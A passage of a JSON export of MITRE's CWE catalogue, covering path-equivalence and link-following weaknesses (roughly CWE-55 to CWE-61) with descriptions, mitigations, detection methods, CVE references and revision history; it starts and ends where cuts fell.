\\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/./ (single dot directory)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Single Dot Directory - /./","attr":{"@_Date":"2008-04-11"}}}},"56":{"attr":{"@_ID":"56","@_Name":"Path Equivalence: \'filedir*\' (Wildcard)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of asterisk wildcard (\'filedir*\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"155","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir* (asterisk / wildcard)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Asterisk Wildcard - filedir*","attr":{"@_Date":"2008-04-11"}}}},"57":{"attr":{"@_ID":"57","@_Name":"Path Equivalence: \'fakedir/../realdir/filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains protection mechanisms to restrict access to \'realdir/filename\', but it constructs pathnames using external input in the form of \'fakedir/../realdir/filename\' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"dirname/fakechild/../realchild/filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This is a manipulation that uses an injection for one consequence (containment violation using relative path) to achieve a different consequence (equivalence by alternate name).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - dirname/fakechild/../realchild/filename","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \'dirname/fakechild/../realchild/filename\'","attr":{"@_Date":"2008-10-14"}}]}},"58":{"attr":{"@_ID":"58","@_Name":"Path Equivalence: Windows 8.3 Filename","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a protection mechanism that restricts access to a long filename on a Windows operating system, but the software does not properly restrict access to the equivalent short \\"8.3\\" filename.","Extended_Description":"On later Windows operating systems, a file can have a \\"long name\\" and a short name that is compatible with older Windows file systems, with up to 8 characters in the filename and 3 characters for the extension. These \\"8.3\\" filenames, therefore, act as an alternate name for files with long names, so they are useful pathname equivalence manipulations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable Windows from supporting 8.3 filenames by editing the Windows registry. Preventing 8.3 filenames will not remove previously generated 8.3 filenames."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows 8.3 Filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "DOS 8.3 Filenames", Page 673"}}]},"Notes":{"Note":{"#text":"Probably under-studied","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows 8.3 Filename","attr":{"@_Date":"2008-04-11"}}}},"59":{"attr":{"@_ID":"59","@_Name":"Improper Link Resolution Before File Access (\'Link Following\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Soft links are a UNIX term that is synonymous with simple shortcuts on windows based platforms."},"Alternate_Terms":{"Alternate_Term":{"Term":"insecure temporary file","Description":"Some people use the phrase \\"insecure temporary file\\" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism then an attacker may be able to bypass the mechanism."},{"Scope":"Other","Impact":"Execute Unauthorized Code or Commands","Note":"Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since a \\".LNK\\" file can be uploaded like a normal file. This can enable remote execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Window manager does not properly handle when certain symbolic links point to \\"stale\\" locations, which could allow local users to create or truncate arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"},{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"},{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Link Following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS01-C","Entry_Name":"Check for the existence of links when dealing with files"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"FIO01-PL","Entry_Name":"Do not operate on files that can be modified by untrusted users","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"132"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Symbolic Link Attacks", Page 518"}}},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations.","Some potential factors are race conditions, permissions, and predictability."]},{"#text":"UNIX hard links, and Windows hard/soft links are under-studied and under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Common_Consequences, Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Link Following","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Links Before File Access (aka \'Link Following\')","attr":{"@_Date":"2009-05-27"}}]}},"61":{"attr":{"@_ID":"61","@_Name":"UNIX Symbolic Link (Symlink) Following","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"A software system that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to 